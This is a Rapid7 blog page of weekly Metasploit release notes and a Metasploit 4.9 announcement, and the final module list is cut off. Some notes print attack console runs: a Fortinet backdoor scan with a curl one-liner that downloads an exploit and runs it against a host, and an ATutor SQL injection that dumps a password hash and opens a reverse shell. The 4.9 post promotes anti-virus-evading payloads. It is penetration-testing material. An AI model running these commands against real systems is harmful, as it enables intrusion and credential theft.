Rapid7 Blog

Release Notes  

Weekly Metasploit Wrapup

Powershell? In my Meterpreter? It's more likely than you think! Hot on the heels of his fantastic Python extension, the legendary OJ Reeves has once again busted out an awesome new ability for post-exploitation, this time by putting a fully functional powershell inside your native…

Powershell? In my Meterpreter? It's more likely than you think! Hot on the heels of his fantastic Python extension, the legendary OJ Reeves has once again busted out an awesome new ability for post-exploitation, this time by putting a fully functional powershell inside your native Windows Meterpreter sessions. Unlike the Python extension, which uploads an embedded interpreter, the new powershell extension loads the .NET runtime from the victim system. There's a lot of polish and more work to be done here, but the shell is quite functional and gives you access to all kinds of capabilities. The next big improvement here is the ability to import files so you can take advantage of existing PS scripts, which is already in testing and should be out with the next update if everything goes to plan. Metasploit3 is dead, long live MetasploitModule Metasploit modules all define a class to implement their functionality. In the original plan, that class's name contained Metasploit's major version number so it would be possible to tell if a module was compatible. The way it really happened is the number just sat there doing nothing since the major version changes very infrequently. The most recent time was just after the project was acquired by Rapid7 a little over six years ago. Before that, the last time the major version changed was when the project was rewritten from scratch in 2005, ported from Perl to Ruby. In the last six years, many things have changed considerably -- APIs have been updated, moved, or deleted; new protocols have been added; someone injected SNES shellcode into Super Mario World by hand -- the world is a different place now. Basically the idea that the major version would describe whether something is compatible was never real. So we've decided to get rid of the confusing pointless number in modules' class names and just call them MetasploitModule. Your existing custom modules will continue to work without modification, but with a warning that you should update the module's class name. You can make that update to all your custom modules with this one-liner: find ~/.msf4/modules -name '*.rb' | xargs sed -i 's/class Metasploit[34]/class MetasploitModule/' If you're on OS X, your sed(1) is dumb and requires an argumen to -i: find ~/.msf4/modules -name '*.rb' | xargs sed -i '' 's/class Metasploit[34]/class MetasploitModule/' Up Up Down Down UDP Select Start One of my favorite things about Metasploit is its socket abstractions. The ability to create sockets from a Meterpreter session and treat them as a regular Ruby socket is very powerful -- it's what powers port forwarding and routing. Recently it came to long-time contributor sempervictus' attention that UDP didn't behave quite the same way as TCP in this regard. Because UDP sockets created on a Meterpreter session didn't return a normal socket, they couldn't be passed to the low-level select method. Now that UDP works just like TCP, it opens up some new ways we can use them for evil awesome. Words, Words, Words This update comes with several improvements to documentation. The first is a tool called find_release_notes that allows you to find the release notes for a given pull request or module so you can quickly figure out the historical context of when a thing made it into the stable release. You can find it in the tools/dev directory. Next, we've added some new templates for submitting GitHub Issues and Pull Requests which will hopefully standardize the process of contributing and make it a little easier for contributors. Knowing what is expected beforehand means less back-and-forth for new contributors, smoothing out and speeding up the whole Pull Request process. And my favorite new documentation addition in this update is a way of documenting individual modules. A new directory, documentation/modules/, matches the layout of the modules/ and contains markdown files describing how the corresponding module can best be utilized. A handful of the most important modules already have documentation and more are on the way. The great thing about it is it's just markdown, so it's super easy to write, and incidentally writing simple walkthroughs of existing modules is a great place to get started contributing. To check it out, you can use the info command's new -d flag (for "documentation") to turn that markdown into a nice HTML page and view it in a browser. There are more details in the wiki article Generating Module Documentation. New Modules Exploit modules (1 new) PHP Utility Belt Remote Code Execution by Jay Turla, and WICS Auxiliary and post modules (5 new) Android Stock Browser Iframe DOS by Jean Pascal Pereira, and Jonathan Waggoner exploits CVE-2012-6301 HTTP Client Information Gather by sinn3r EasyCafe Server Remote File Access by Brendan Coles, and R-73eN Apache Karaf Default Credentials Command Execution by Nicholas Starke Multi Manage Set Wallpaper by timwr Get it As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff since the last blog post is available on GitHub: 4.11.14...4.11.19

Weekly Metasploit Wrapup

Scanning for the Fortinet backdoor with Metasploit Written by wvu Metasploit now implements a scanner for the Fortinet backdoor. Curious to see how to use it? Check this out! wvu@kharak:~/metasploit-framework:master$ ./msfconsole -qL msf > use auxiliary/scanner/ssh/fortinet_backdoor msf auxiliary(…

Scanning for the Fortinet backdoor with Metasploit Written by wvu Metasploit now implements a scanner for the Fortinet backdoor. Curious to see how to use it? Check this out! wvu@kharak:~/metasploit-framework:master$ ./msfconsole -qL msf > use auxiliary/scanner/ssh/fortinet_backdoor msf auxiliary(fortinet_backdoor) > set rhosts 417.216.55.0/24 rhosts => 417.216.55.0/24 msf auxiliary(fortinet_backdoor) > set threads 100 threads => 100 msf auxiliary(fortinet_backdoor) > run [*] Scanned 35 of 256 hosts (13% complete) [*] Scanned 84 of 256 hosts (32% complete) [*] Scanned 90 of 256 hosts (35% complete) [+] 417.216.55.69:22 - Logged in as Fortimanager_Access [*] Scanned 103 of 256 hosts (40% complete) [*] Scanned 136 of 256 hosts (53% complete) [*] Scanned 174 of 256 hosts (67% complete) [*] Scanned 180 of 256 hosts (70% complete) [*] Scanned 205 of 256 hosts (80% complete) [*] Scanned 233 of 256 hosts (91% complete) [*] Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(fortinet_backdoor) > [1]+ Stopped ./msfconsole -qL wvu@kharak:~/metasploit-framework:master$ python <(curl -s https://www.exploit-db.com/download/39224) 417.216.55.69 FortiGate-VM64 # config Configure object. get Get dynamic and system information. show Show configuration. diagnose Diagnose facility. execute Execute static commands. exit Exit the CLI. FortiGate-VM64# Easy as can be. The module doesn't get sessions yet due to complications with net-ssh, but we're working on it! Shall we play a game, ATutor? Written by Bill Webb Ever wished you could live out your Wargames fantasies, easily changing your grades all while impressing the ladies?  Now you can with the addition of the ATutor 2.2.1 SQL injection module.  This module exploits the vulnerability described in CVE-2016-2555, allowing one to bypass authentication and reach the administrators interface.  While reaching the vulnerability requires one to login to ATutor as a student, remote registration is enabled by default.  Once you have gained access to the admin console, you can do all sorts of fun stuff, such as uploading malicious code ... msf exploit(atutor_sqli) > check [+] The target is vulnerable. msf exploit(atutor_sqli) > exploit [*] Started reverse TCP handler on 192.168.1.199:4444 [*] 192.168.1.202:80 - Logged in as admin, sending a few test injections... [*] 192.168.1.202:80 - Dumping username and password hash... [+] 192.168.1.202:80 - Got the admin hash: bcbc84567720217d190cab05ac3bf7722f2936ca ! [*] 192.168.1.202:80 - Logged in as admin, uploading shell... [+] 192.168.1.202:80 - Shell upload successful! [*] Sending stage (33684 bytes) to 192.168.1.202 [*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.202:49271) at 2016-02-29 18:44:11 -0600 [+] 192.168.1.202:80 - Deleted ocfw.php [+] 192.168.1.202:80 - Deleted ../../content/module/qee/ocfw.php meterpreter > ... or pulling off their best Matthew Broderick impersonation. It's almost like it's 1983 again. (We can't guarantee that the ladies will in fact be impressed ...) New modules Exploit modules (3 new) ATutor 2.2.1 SQL Injection / Remote Code Execution by mr_me exploits CVE-2016-2555 NETGEAR ProSafe Network Management System 300 Arbitrary File Upload by Pedro Ribeiro exploits CVE-2016-1525 AppLocker Execution Prevention Bypass by Casey Smith and OJ Reeves Auxiliary and post modules (6 new) NETGEAR ProSafe Network Management System 300 Authenticated File Download by Pedro Ribeiro exploits CVE-2016-1524 Apache Karaf Default Credentials Command Execution by Nicholas Starke Linknat Vos Manager Traversal by Nixawk Dahua DVR Auth Bypass Scanner by Jake Reynolds, Jon Hart, Nathan McBride, and Tyler Bennett exploits CVE-2013-6117 Fortinet SSH Backdoor Scanner by wvu and operator8203 exploits CVE-2016-1909 Apache Karaf Login Utility by Brent Cook, Dev Mohanty, Greg Mikeska, Peer Aagaard, and Samuel Huckins Get it As always, these new features are only an msfupdate away! You can view the changes here: 4.11.10...4.11.14.

Weekly Metasploit Wrapup

I'm not your mother, clean up after yourself. An old friend of mine, axis2deployer, is a fun authenticated code execution module that takes advantage of Axis2's ability to deploy new applications on a web server. It used to be a messy friend, leaving its files…

I'm not your mother, clean up after yourself. An old friend of mine, axis2deployer, is a fun authenticated code execution module that takes advantage of Axis2's ability to deploy new applications on a web server. It used to be a messy friend, leaving its files all over the living room floor for you to clean up manually. As of #6457, you don't have to worry about those files any more because it uses the FileDropper mixin. When you're writing a module that requires putting something on the file system, the polite thing to do is delete it when you're done and that's exactly what FileDropper is for. Just include the mixin and call register_file_for_cleanup with the remote path, and when a session is created Metsaploit will use it to delete your mess. Code of Conduct The wider development community has been talking about Codes of Conduct for a while now as a result of a lot of poor behavior. The Metasploit Project has been fortunate not to have had to deal with jerks on the scale that some other projects have, but in order to head those jerks off at the pass, Metasploit now has a Code of Conduct. Here's an excerpt that explains the motivation: We are committed to making participation in this project a harassment-free   experience for everyone, regardless of level of experience, gender, gender   identity and expression, sexual orientation, disability, personal appearance,   body size, race, ethnicity, age, religion, or nationality. This CoC provides a way for you to contact us and let us know about unacceptable behavior in the community as well as providing guidelines so people know what to expect when such things must be enforced. Project maintainers have the right and responsibility to remove, edit, or   reject comments, commits, code, wiki edits, issues, and other contributions   that are not aligned to this Code of Conduct, or to ban temporarily or   permanently any contributor for other behaviors that they deem inappropriate,   threatening, offensive, or harmful. For developers and potential contributors, this means we've got your back. The goal is to give you confidence that if things go wrong, there is already a plan in place and rules that can help. I think it's also important to point out that there was zero dissent in the Pull Request discussion among current committers about whether to adopt this CoC. The building isn't currently on fire, but we as a community, and I personally, want you to be safe putting it out if one comes along. The previous law of the land in the People's Republic of Metasploit was an informal adherance to Wheaton's Law, and that still stands. By adopting a more formal and explicit set of rules, we intend to foster a more welcoming environment where everyone feels comfortable making their first Pull Request. New Modules Auxiliary and post modules Windows Gather Active Directory Managed Groups by Stuart Morgan Windows Manage Privilege Based Process Migration by Josh Hale and theLightCosine Get it As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff is available on GitHub: 4.11.6...4.11.7 Happy hacking.

Weekly Metasploit Wrapup

Aaaaaand we're back! Last week was the first weekly update of the year and it comes with a super fun stuff. Tunneling The latest update allows you to tunnel reverse_tcp sessions over a compromised machine in a slightly less painful way. There is now…

Aaaaaand we're back! Last week was the first weekly update of the year and it comes with a super fun stuff. Tunneling The latest update allows you to tunnel reverse_tcp sessions over a compromised machine in a slightly less painful way. There is now a new datastore option, ReverseListenerComm, which lets you tell a meterpreter session tunnel connections back to your payload handler. Here's an example run to give you the idea: msf exploit(payload_inject) > show options Module options (exploit/windows/local/payload_inject): Name Current Setting Required Description ---- --------------- -------- ----------- NEWPROCESS true no New notepad.exe to inject to PID no Process Identifier to inject of process to inject payload. SESSION yes The session to run this module on. Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (accepted: , , seh, thread, process, none) LHOST 127.0.0.1 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows msf exploit(payload_inject) > set ReverseListenerComm 1 ReverseListenerComm => 1 msf exploit(payload_inject) > set SESSION 1 SESSION => 1 msf exploit(payload_inject) > run [*] Started reverse handler on 127.0.0.1:4444 via the meterpreter on session 1 [*] Running module against WIN-2DE8F2QP867 [*] Launching notepad.exe... [*] Preparing 'windows/meterpreter/reverse_tcp' for PID 3092 [*] Sending stage (884270 bytes) [*] Meterpreter session 2 opened (192.168.5.101-192.168.5.1:4444 -> 127.0.0.1:63173) at 2015-05-20 00:09:44 +0100 meterpreter > The really important line there is this: [*] Started reverse handler on 127.0.0.1:4444 via the meterpreter on session 1 The compromised machine is listening on its localhost for the new connection, but it doesn't have to be localhost, you can tell it to listen on an external address and use psexec against a second internal machine. This used be possible by creating a route and setting your LHOST to a victim machine's IP address within that route, but it wasn't really clear how to do it and the settings were quite error prone; now it's just a single option to tell Metasploit explicitly where to listen for the payload. Super fun modules Joomla This update comes with a pre-authentication exploit for Joomla, the popular CMS, another in a rich and storied history of deserialization bugs. We've also abstracted some common things into a Joomla mixin, so the next time one of these comes along, writing the exploit is will be faster and easier. Hacking Time From the module description: The end goal is to cause ntpd to declare the legitimate peers "false tickers" and choose the attacking clients as the preferred peers, allowing these peers to control time. Now you, too, can go... NAK to the Future! Exploit modules Joomla HTTP Header Unauthenticated Remote Code Execution by Christian Mehlmauer and Marc-Alexandre Montpas exploits CVE-2015-8562 Auxiliary and post modules Android Stock Browser Iframe DOS by Jean Pascal Pereira and Jonathan Waggoner exploits CVE-2012-6301 NTP "NAK to the Future" by Jon Hart and Matthew Van Gundy of Cisco ASIG exploits CVE-2015-7871 Redis File Upload by Jon Hart and Nixawk MS15-134 Microsoft Windows Media Center MCL Information Disclosure by sinn3r and Francisco Falcon exploits CVE-2015-6127 Post Windows Gather NTDS.DIT Location by Stuart Morgan As always, you can get all these modules and improvements with a simple msfupdate and the full diff is available on GitHub:  4.11.5-2015121501...4.11.5-2016010401

Weekly Metasploit Wrapup

Welcome to the last Metasploit update of the year! Since January 1st, 2015, we've had 6364 commits from 176 unique authors, closed 1119 Pull Requests, and added 323 modules. Thank you all for a great year! We couldn't have done it without you.SoundsThe sounds…

Welcome to the last Metasploit update of the year! Since January 1st, 2015, we've had 6364 commits from 176 unique authors, closed 1119 Pull Requests, and added 323 modules. Thank you all for a great year! We couldn't have done it without you.SoundsThe sounds plugin has been around for a long time, notifying hackers of new shells via their speakers since 2010. Recently, Wei sinn3r Chen gave it a makeover, replacing the old robotic voice with that of Offensive Security founder, Kali Linux Core Developer, and all-around cool guy Mati "muts" Aharoni. Now when you get a new session, you'll be treated to his sultry voice congratulating you and when an exploit fails, he'll encourage you to try harder. Just type "load sounds" in msfconsole to hear it in action.New ModulesWe have eight new modules this week -- 5 exploits and 3 post modules. Among them is an exploit for Jenkins that takes advantage of the java deserialization issue brought to the world's attention by FoxGlove Security a few weeks ago. More exploits for similar vulnerabilities are undoubtedly on the way.Exploit modulesJenkins CLI RMI Java Deserialization Vulnerability by juan vazquez, Christopher Frohoff, Dev Mohanty, Louis Sato, Steve Breen, Wei Chen, and William Vu exploits CVE-2015-8103phpFileManager 0.9.8 Remote Code Execution by Jay Turla and hyp3rlinxLegend Perl IRC Bot Remote Code Execution by Jay Turla exploits OSVDB-121681Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution by Conor Patrick, Jay Turla, and Matt ThayerManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability by sinn3r exploits CVE-2015-8249Auxiliary and post modulesUNIX Gather RSYNC Credentials by Jon HartBitlocker Master Key (FVEK) Extraction by Danil BazinWindows Antivirus Exclusions Enumeration by Andrew Smith and Jon HartGet itAs always, you can get all these modules and improvements with a simple msfupdate and the full diff is available on GitHub: 4.11.5-2015120901...4.11.5-2015121501

Weekly Metasploit Wrapup

Python extension for Windows MeterpreterMeterpreter offers some pretty powerful post-exploitation capabilities, from filesystem manipulation to direct Windows API calls with railgun, and everything in between.One thing that's been missing for a long time is on-victim scripting. With this update comes an experimental Python extension…

Python extension for Windows MeterpreterMeterpreter offers some pretty powerful post-exploitation capabilities, from filesystem manipulation to direct Windows API calls with railgun, and everything in between.One thing that's been missing for a long time is on-victim scripting. With this update comes an experimental Python extension to remedy that. It's still in its infancy, so expect some kinks to be worked out over the next few weeks, but it is functional. OJ's excellent Pull Request offers some insights into how it works and where it's going.New ModulesThis update also includes a few PHP code execution exploits, including one for the very popular vBulletin, a cheeky one for a cute backdoor used by Chinese attackers according to the great analysis by FireEye, and one for Up.Time.Up.Time, the tale of a bad patchIn late 2013, we published an exploit module by Denis Andzakovic targetting Up.Time, an IT infrastructure monitoring tool. As part of the initial advisory, the researcher quoted the vendor sayingAs a policy to protect our customers, we do not discuss any vulnerabilities with outside companies.Which apparently includes the person reporting the vulnerability.And indeed, there doesn't seem to be any public discussion of this vuln (or any others for that matter) from the vendor, not even a mention of when a patch was available. It turns out that, whenever that patch came out, it didn't actually fix the vulnerability and thanks to contributors Ewerson Guimaraes and Gjoko Krstic, we now have an exploit that targets the latest Up.Time versions 7.4 and 7.5.Exploit modulesChina Chopper Caidao PHP Backdoor Code Execution by NixawkManageEngine ServiceDesk Plus Arbitrary File Upload by Pedro Ribeiro exploits ZDI-15-396Th3 MMA mma.php Backdoor Arbitrary File Upload by Jay TurlaNibbleblog File Upload Vulnerability by Roberto Soares Espreto and UnknownIdera Up.Time Monitoring Station 7.0 post2file.php Arbitrary File Upload by Denis Andzakovic exploits OSVDB-100423Idera Up.Time Monitoring Station 7.4 post2file.php Arbitrary File Upload by Denis Andzakovic, Ewerson Guimaraes(Crash), and Gjoko Krstic(LiquidWorm)vBulletin 5.1.2 Unserialize Code Execution by Julien (jvoisin) Voisin, Netanel Rubin, and cutz exploits CVE-2015-7808Zpanel Remote Unauthenticated RCE by Balazs Makany, Jose Antonio Perez, brad wolfe, brent morris, dawn isabel, and james fitts exploits OSVDB-102595Safari User-Assisted Applescript Exec Attack by joev exploits CVE-2015-7007Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation by rebel and shandelman116 exploits CVE-2015-5889Wordpress Ajax Load More PHP Upload Vulnerability by Roberto Soares Espreto and UnknownX11 Keyboard Command Injection by xistenceWatermark Master Buffer Overflow (SEH) by Andrew Smith and metacom exploits CVE-2013-6935HP SiteScope DNS Tool Command Injection by Charles Riggs, Juan Vazquez, and Kirk HayesAuxiliary and post modulesJoomla Real Estate Manager Component Error-Based SQL Injection by Nixawk and Omer RamicJoomla com_contenthistory Error-Based SQL Injection by Asaf Orpani, Nixawk, and bperry exploits CVE-2015-7297BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure by Brad Wolfe, James Fitts, and Jay Turla exploits CVE-2015-7602PCMan FTP Server 2.0.7 Directory Traversal Information Disclosure by Brad Wolfe, James Fitts, and Jay Turla exploits CVE-2015-7601ElasticSearch Snapshot API Directory Traversal by Benjamin Smith, Jose A. Guasch, and Pedro Andujar exploits CVE-2015-5531HTTP Host Header Injection Detection by Jay Turla and Medz BaraoManageEngine ServiceDesk Plus Path Traversal by xistenceGet itAs always, all the changes since the last wrapup can be had with a simple msfupdate and the full diff is available on github: 4.11.5-2015110801...4.11.5-2015111801

Weekly Metasploit Wrapup

One of the greatest things about Metasploit is that it supports lots of different protocols and technologies that you would otherwise need a huge menagerie of tools to be able to talk to, an ever-expanding bubble of interoperability that you didn't have to write. Due…

One of the greatest things about Metasploit is that it supports lots of different protocols and technologies that you would otherwise need a huge menagerie of tools to be able to talk to, an ever-expanding bubble of interoperability that you didn't have to write. Due to some great ongoing work by Bigendian Smalls, the bubble is getting even bigger, now encompassing shell sessions on mainframes. You can see the beginnings in #6013 and #6067New ModulesThis update also comes with a fun privilege escalation exploit for OSX where an environment variable ends up on a commandline. I love these kinds of bugs because people have been screwing up environment variables since the invention of shells.As always, you can see all the changes since the last wrapup on github: 4.11.4-2015102801...4.11.5-2015103001Exploit modulesTh3 MMA mma.php Backdoor Arbitrary File Upload by Jay TurlaMac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation by rebel and shandelman116 exploits CVE-2015-5889Auxiliary and post modulesJoomla Real Estate Manager Component Error-Based SQL Injection by Nixawk and Omer RamicJoomla com_contenthistory Error-Based SQL Injection by Asaf Orpani, Nixawk, and bperry exploits CVE-2015-7297

New Metasploit 4.9 Helps Evade Anti-Virus Solutions, Test Network Segmentation, and Increase Productivity for Penetration Testers

Metasploit 4.9 helps penetration testers evade anti-virus solutions, generate payloads, test network segmentation, and generally increase productivity through updated automation and reporting features. Since version 4.8, Metasploit has added 67 new exploits and 51 auxiliary and post-exploitation modules to both its commercial and…

Metasploit 4.9 helps penetration testers evade anti-virus solutions, generate payloads, test network segmentation, and generally increase productivity through updated automation and reporting features. Since version 4.8, Metasploit has added 67 new exploits and 51 auxiliary and post-exploitation modules to both its commercial and open source editions, bringing our total module count up to 1,974. The new version is available immediately.Generate AV-evading Dynamic PayloadsMalicious attackers use custom payloads to evade anti-virus solutions. Because traditional Metasploit Framework payloads are open source and well known to AV vendors, they are often quarantined by AV solutions when conducting a penetration test, significantly delaying an engagement or even stopping a successful intrusion, giving the organization a false sense of security. Penetration testers must therefore have the ability to evade AV solutions to simulate realistic attacks.The new Metasploit Pro 4.9 generates Dynamic Payloads that evade detection in more than 90% of cases and has the ability to evade all ten leading anti-virus solutions by creating a unique payload for each engagement that does not demonstrate the typical behavior flagged by heuristic algorithms. Dynamic Payloads significantly increase productivity of a penetration tester by saving many hours of creating custom payloads as well as trial and error to evade detection through encoding and ensure that organizations do not fall prey to a false sense of security.With Dynamic Payloads, you'll have these advantages:Evade all leading anti-virus vendors: Dynamic Payloads evade the top 10 AV solutions in more than 90% of cases. No AV vendor detects all MSP payload options!More stable sessions: Dynamic Payloads use error corrections to make sessions more stable than regular MSF sessionsIPS Evasion through stage encoding: Stager will encode the traffic when downloading the payload, which can help evade IPSDynamic payloads are exclusive to Metasploit Pro. To test the new AV evasion, get your free Metasploit Pro trial now.Free Webcast: Evading Anti-Virus Solutions with Dynamic Payloads in Metasploit ProIf you would like to learn more about how Dynamic Payloads are used to evade anti-virus solutions, join us on the free webcast "Evading Anti-Virus Solutions with Dynamic Payloads in Metasploit Pro" with Metasploit engineer David Maloney.Register for Americas time zone & on-demandRegister for European time zoneEasily generate stand-alone payloads with the Payload GeneratorPenetration testers sometimes need a stand-alone payload to install on a machine they have compromised and want to control. Generating stand-alone payloads with msfvenom in Metasploit Framework is very cumbersome even for the most experienced Framework user. The new Payload Generator makes it very easy to generate Classic Payloads for any platform, architecture, stager, stage, encoding and output format.The Payload Generator with Classic Payloads is available in the free Metasploit Community Edition as well as the commercial editions Metasploit Express and Metasploit Pro. Dynamic Payloads can also be downloaded as stand-alone executables and are exclusive to Metasploit Pro. To test the new payload generator, get your free Metasploit Community license or free Metasploit Pro trial now.Test whether your network segmentation is operational and effectiveNetwork segmentation is a security best practice that can help contain a breach to one part of the network by act of splitting a computer network into subnetworks, the so-called segments.While network segmentation is not required by PCI DSS, it is often used to limit the scope the networking falling under PCI compliance. This can drastically limit the effort and cost of PCI compliance.However, there is plenty of room for error in setting up network segmentation, and many companies learned this the hard way. In an interview with SearchSecurity, Try Leach, CTO of the PCI Security Standards Council said: "In the past, we've seen compromises where organizations thought they were doing the right thing, adequately segmenting off what they deemed to be their CDEs, only to find [the security controls were] never tested appropriately."As a result, PCI version 3.0 added requirement 11.3.4, that requires that you conduct a penetration test to verify that your network segmentation is operational and effective. You need to be compliant by June 30, 2015.Metasploit Pro 4.9 adds a new MetaModule for testing whether network segmentation is operational and effective. The MetaModule requires a target server, e.g. on a laptop, in the target network so that Metasploit Pro can test for open ports between the Metasploit Pro instance and the testing server.This and other MetaModules are exclusive to Metasploit Pro. To test your network segmentation, get the free Metasploit Pro trial now.Boost your productivity with new and improved Task ChainsSecurity assessments contain many repetitive and tedious tasks, and long waiting times in between. This is not only frustrating for you as a penetration tester but also increases the cost of engagements to a level where it's not feasible to test on a regular basis.In a recent survey with more than 2,000 Metasploit users, Metasploit Pro users said that they save 45% of time compared to using Metasploit Framework. With Metasploit Pro 4.9, we're increasing your productivity even further.Using the new Task Chains' drag & drop interface, you can create custom workflows, either for running on-demand or on a one-time or repeated schedule. For example, you could schedule a network discovery scan, followed by a single pass of MS08-067 exploitation, looting of credentials and screenshots, and an iterative login with known credentials and looting more credentials to come back to an owned network the next morning. Or you could watch it run while focusing on other tasks.What would you do with the extra time you've gained from added productivity? You could conduct more assessments, focus your efforts on tasks that really require your expertise, clean up your inbox, or just get home earlier in the day.Task chains are exclusive to Metasploit Pro. To start creating your custom workflows, get the free Metasploit Pro trial now.This and other MetaModules are exclusive to Metasploit Pro. To test your network segmentation, get the free Metasploit Pro trial now.Enjoy a more powerful Meterpreter payloadSince the 4.8 release, we have greatly improved Meterpreter's capabilities and reliability. While we were at it, we overhauled the Windows and POSIX Meterpreter development environment to make it easier to set up for researchers and open source contributors.Exciting new Meterpreter functions include:Monitor clipboards: automatically download contents of the target's clipboard, continously for the life of the sessionHave a two-way video chat with your victim: have a heart-to-heart with your compromised client system, in real timeQuery ADSI and WMI: enables hardcore Windows Domain hackers to rifle through Active Directory recordsAccess cleartext credentials: snarf in-memory passwords on 32-bit and 64-bit platforms with improved MimikatzImpersonate in-memory tokens: with the new and improved Incognito extensionTest your network with 118 new exploits, auxiliary and post-exploitation modulesMetasploit is constantly updating its arsenal of exploits, auxiliary and post-exploitation modules to ensure that you're testing your network against the latest threats. We believe that sharing vulnerabilities and exploits broadly with the community increases security for everyone, which is why we also make all of our modules available in our free editions Metasploit Framework and Metasploit Community.We're adding new exploits at a rate of 1.2 per day, and here's what we've added since version 4.8:Exploit modulesAndroid Browser and WebView addJavascriptInterface Code Execution by joev and jduckFirefox Exec Shellcode from Privileged Javascript Shell by joevRed Hat CloudForms Management Engine 5.1 agent/linuxpkgs Path Traversal by Ramon de C Valle exploits CVE-2013-2068Kloxo SQL Injection and Remote Code Execution by juan vazquez and UnknownNETGEAR ReadyNAS Perl Code Evaluation by juan vazquez, hdm, and Craig Young exploits CVE-2013-2751Pandora FMS Remote Code Execution by xistenceSupermicro Onboard IPMI close_window.cgi Buffer Overflow by juan vazquez and hdm exploits CVE-2013-3623Synology DiskStation Manager SLICEUPLOAD Remote Command Execution by Markus Wulftange exploits CVE-2013-6955SerComm Device Remote Code Execution by Eloi Vanderbeken and Matt "hostess" Andreko exploits OSVDB-101653Loadbalancer.org Enterprise VA SSH Private Key Exposure by xistenceQuantum DXi V1000 SSH Private Key Exposure by xistenceQuantum vmPRO Backdoor Command by xistenceFirefox 5.0 - 15.0.1 __exposedProps__ XCS Code Execution by joev, Mariusz Mlynski, and moz_bug_r_a4 exploits CVE-2013-1710Apache Roller OGNL Injection by juan vazquez and Unknown exploits CVE-2013-4212Cisco Prime Data Center Network Manager Arbitrary File Upload by juan vazquez and rgod exploits ZDI-13-254Adobe ColdFusion 9 Administrative Login Bypass by Mekanismen and Scott Buckel exploits CVE-2013-0632Dexter (CasinoLoader) SQL Injection by bwall (Brian Wallace)HP SiteScope issueSiebelCmd Remote Code Execution by juan vazquez and rgod exploits ZDI-13-263MediaWiki Thumb.php Remote Command Execution by Ben Campbell, Ben Harris, Brandon Perry, and Netanel Rubin exploits CVE-2014-1610Oracle Forms and Reports Remote Code Execution by Mekanismen and miss_sudo exploits CVE-2012-3153Apache Struts 2 Developer Mode OGNL Execution by juan vazquez, Alvaro, Andreas Nusser, and Johannes Dahse exploits CVE-2012-0394Apache Tomcat Manager Authenticated Upload Code Execution by rangercha exploits ZDI-10-214Up.Time Monitoring Station post2file.php Arbitrary File Upload by Denis Andzakovic exploits OSVDB-100423vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload by juan vazquez and Egidio Romano exploits CVE-2013-3215Safari User-Assisted Download and Run Attack by joevArray Networks vAPV and vxAG Private Key Privilege Escalation Code Execution by xistence exploits OSVDB-104654FreePBX config.php Remote Code Execution by 0x00string, i-Hmx, and xistence exploits CVE-2014-1903Horde Framework Unserialize PHP Code Execution by juan vazquez and EgiX exploits CVE-2014-1691Kimai v0.9.2 'db_restore.php' SQL Injection by Brendan Coles and drone exploits OSVDB-93547OpenSIS 'modname' PHP Code Execution by Brendan Coles and EgiX exploits CVE-2013-1349WordPress OptimizePress Theme File Upload Vulnerability by Mekanismen and United of Muslim Cyber ArmySimple E-Document Arbitrary File Upload by Brendan Coles and vinicius777SkyBlueCanvas CMS Remote Code Execution by Scott Parish and xistence exploits CVE-2014-1683vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection by juan vazquez and Orestis Kourides exploits CVE-2013-3522Zimbra Collaboration Server LFI by Mekanismen and rubina119 exploits CVE-2013-7091Symantec Endpoint Protection Manager Remote Command Execution by Chris Graham, Stefan Viehbock, and xistence exploits CVE-2013-5015Adobe Reader ToolButton Use After Free by sinn3r, juan vazquez, Soroush Dalili, and Unknown exploits ZDI-13-212MS12-022 Microsoft Silverlight ScriptObject Unsafe Memory Access by juan vazquez, James Forshaw, and Vitaliy Toropov exploits CVE-2013-3896MS13-090 CardSpaceClaimCollection ActiveX Integer Underflow by juan vazquez and Unknown exploits CVE-2013-3918MS14-012 Internet Explorer TextRange Use-After-Free by sinn3r and Jason Kratzer exploits CVE-2014-0307KingScada kxClientDownload.ocx ActiveX Remote Code Execution by juan vazquez and Andrea Micalizzi exploits ZDI-14-011Adobe Reader ToolButton Use After Free by sinn3r, juan vazquez, Soroush Dalili, and Unknown exploits ZDI-13-212ALLPlayer M3U Buffer Overflow by Gabor Seljan, Mike Czumak, and metacom exploits OSVDB-98283Audiotran PLS File Stack Buffer Overflow by Philip OKeefeEasy CD-DA Recorder PLS Buffer Overflow by juan vazquez, Gabor Seljan, and chap0 exploits CVE-2010-2343IBM Forms Viewer Unicode Buffer Overflow by juan vazquez and rgod exploits ZDI-13-274IcoFX Stack Buffer Overflow by juan vazquez and Marcos Accossatto exploits CVE-2013-4988MPlayer Lite M3U Buffer Overflow by C4SS!0 and h1ch4m and Gabor Seljan exploits BID-46926MS13-096 Microsoft Tagged Image File Format (TIFF) Integer Overflow by sinn3r and Unknown exploits CVE-2013-3906RealNetworks RealPlayer Version Attribute Buffer Overflow by Gabor Seljan exploits CVE-2013-7260Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow by Fr330wn4g3 and Mike Czumak exploits OSVDB-100619DesktopCentral AgentLogUpload Arbitrary File Upload by Thomas HibbertHP LoadRunner EmulationAdmin Web Service Directory Traversal by juan vazquez and rgod exploits ZDI-13-259Kaseya uploadImage Arbitrary File Upload by Thomas Hibbert exploits OSVDB-99984Windows Escalate UAC Protection Bypass (In Memory Injection) by Ben Campbell, David Kennedy "ReL1K", mitnick, and mubixWindows SYSTEM Escalation via KiTrap0D by HD Moore, OJ Reeves, Pusscat, and Tavis Ormandy exploits CVE-2010-0232Windows TrackPopupMenuEx Win32k NULL Page by Dan Zentner, Matias Soler, Seth Gibson, and Spencer McIntyre exploits CVE-2013-3881Microsoft Windows ndproxy.sys Local Privilege Escalation by juan vazquez, Shahin Ramezany, Unknown, and ryujin exploits CVE-2013-5065Nvidia (nvsvc) Display Driver Service Local Privilege Escalation by Ben Campbell and Peter Wintersmith exploits 